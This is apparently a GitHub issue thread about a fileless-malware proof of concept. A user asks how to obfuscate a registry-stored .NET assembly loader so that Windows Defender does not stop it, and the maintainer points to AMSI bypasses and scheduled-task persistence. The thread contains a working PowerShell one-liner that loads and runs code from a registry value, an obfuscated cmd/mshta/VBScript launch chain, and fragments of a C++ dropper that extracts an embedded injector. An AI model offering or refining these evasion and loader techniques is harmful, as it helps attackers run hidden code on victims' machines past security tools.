Open mrapxs opened 1 month ago
This is possibly due to AMSI. It basically means, that powershell sends your binary to AV for analysis. Try google "AMSI bypass". I've done an implementation in my other project here. However, this won't work on a registry value due to the sheer length. That's why I used a scheduled task instead.
AMSI bypass is not implemented in this PoC, because it's just way too heavy. But you may manage to implement it.
I'm thinking it's due to string escapes but I have NO idea. I want to obfuscate it so windows defender doesn't stop execution. I've tried putting the following into Invoke-Obfuscation
powershell "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
and put the output in like this (omitting the base64 so it's not giant)
LPCSTR runCommand = "CMD /C \"SET NOZ=(neW-OBJEcT io.CompREssION.dEFlatEstreAm([SystEm.iO.meMOryStREaM][SYSteM.CONVERT]::frOMBASe64StRinG('++nT09l9XJyel/'), [sYsTeM.Io.COMprESsiON.COmpRessioNmODe]::DecomPReSs) ^ | % {neW-OBJEcT SYStem.Io.STReaMrEAdeR($_, [texT.EncodING]::aScIi)} ^ | % {$_.rEaDToend()}) ^ | &($vErBOsepReFeRENcE.TOSTRIng()[1,3] + 'x' -Join '') && mshta.eXE VBScript : CReATeObJECt('WSCRIPT.ShEll').RUn('powershell . (${pshomE}[21] + ${pshoME}[34] + 'X') ((.( '{0}{1}' -f 'gC', 'i' ) ('{2}{0}{1}' -f 'nv:', 'NOZ', 'E')).'valUE')\", 1, TRue)(WINDOw.CLosE)\"";
But I get no output. With any type of obfuscation / encryption. Even tried encrypting at runtime but `#include
include
include
include
include
include
include
include
include "../Global/NativeRegistry.h"
include "resource.h"
pragma comment (lib, "crypt32.lib")
bool EncryptData(const BYTE* pbData, DWORD cbData, std::vector& encryptedData)
{
HCRYPTPROV hCryptProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTHASH hHash = NULL;
DWORD dwBlockLen;
DWORD dwBufferLen;
DWORD dwCount;
bool fSuccess = false;
exit: if (hHash) CryptDestroyHash(hHash); if (hKey) CryptDestroyKey(hKey); if (hCryptProv) CryptReleaseContext(hCryptProv, 0);
}
int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { // Read Injector.exe from resources HRSRC injectorResource = FindResourceA(NULL, MAKEINTRESOURCEA(IDR_INJECTOR), "EXE"); if (!injectorResource) return 0;
}`
Still nothing. I'm really confused what I'm doing wrong tbh.